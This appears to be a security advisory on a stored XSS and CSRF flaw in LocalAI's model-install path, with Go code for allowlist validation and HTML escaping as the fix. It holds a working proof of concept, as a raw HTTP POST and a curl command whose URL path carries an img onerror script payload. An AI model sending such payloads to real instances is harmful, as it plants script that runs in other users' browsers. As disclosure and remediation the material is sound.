LocalAI delete model: stored XSS & CSRF vulnerability.
Calling the delete model API with inappropriate parameters can cause a one-time stored XSS, whose payload triggers when a user accesses the homepage.
Use the POST request below to store the payload.
POST /browse/install/model/<img src=x onerror=eval("alert(1)")> HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
HX-Request: true
HX-Current-URL: http://127.0.0.1:8080/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://127.0.0.1:8080
Referer: http://127.0.0.1:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Then we can access the homepage to trigger the XSS.
The console shows that CSRF also exists, and actively combining XSS with CSRF is believed to achieve automatic triggering.
(The payload's src parameter is "x", just for testing.)
Strictly control URL parameters, allowing only numbers, letters, and some special symbols.
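One way to apply this allowlist to the model identifier in the /browse/install/model/ path, as an added example in Go (not LocalAI's own code). The function names, the permitted character set and the HTML fragment are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"html"
	"net/url"
	"regexp"
)

// modelIDPattern is an assumed allowlist: letters, digits and a few
// separators ("." "_" "-" "@"), 1 to 128 characters, alphanumeric first.
var modelIDPattern = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._@-]{0,127}$`)

// ValidateModelID percent-decodes one path segment and accepts it only if the
// decoded form matches the allowlist, so encoded markup cannot slip through.
func ValidateModelID(segment string) (string, error) {
	decoded, err := url.PathUnescape(segment)
	if err != nil {
		return "", fmt.Errorf("malformed escape in model id: %w", err)
	}
	if !modelIDPattern.MatchString(decoded) {
		return "", fmt.Errorf("model id %q contains characters outside the allowlist", decoded)
	}
	return decoded, nil
}

// RenderJobRow builds a hypothetical HTML fragment for the homepage job list.
// The id is escaped on output even though it was validated on input.
func RenderJobRow(modelID string) string {
	return `<li class="job">` + html.EscapeString(modelID) + `</li>`
}

func main() {
	// Constructed inputs: a normal-looking id, the markup from the report,
	// and a percent-encoded variant of similar markup.
	for _, seg := range []string{
		"localai@phi-2",
		`<img src=x onerror=eval("alert(1)")>`,
		"%3Cimg%20src%3Dx%3E",
	} {
		id, err := ValidateModelID(seg)
		if err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		fmt.Println("accepted:", RenderJobRow(id))
	}
}
```

Validation on input and escaping on output are independent controls; the second still protects the homepage if a value reaches storage by another route.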
curl -v -X POST "http://127.0.0.1:8080/browse/install/model/<img src=x onerror=eval('alert(1)')>" \
  -H "Host: 127.0.0.1:8080" \
  -H "HX-Request: true" \
  -H "HX-Current-URL: http://127.0.0.1:8080/" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Accept: */*" \
  -H "Origin: http://127.0.0.1:8080" \
  -H "Referer: http://127.0.0.1:8080/" \
  -H "Accept-Encoding: gzip, deflate" \
  -H "Accept-Language: zh-CN,zh;q=0.9" \
  -H "Connection: close" \
  --data ""
1. This vulnerability allows for the storage and execution of malicious JavaScript code.
2. Automated malicious requests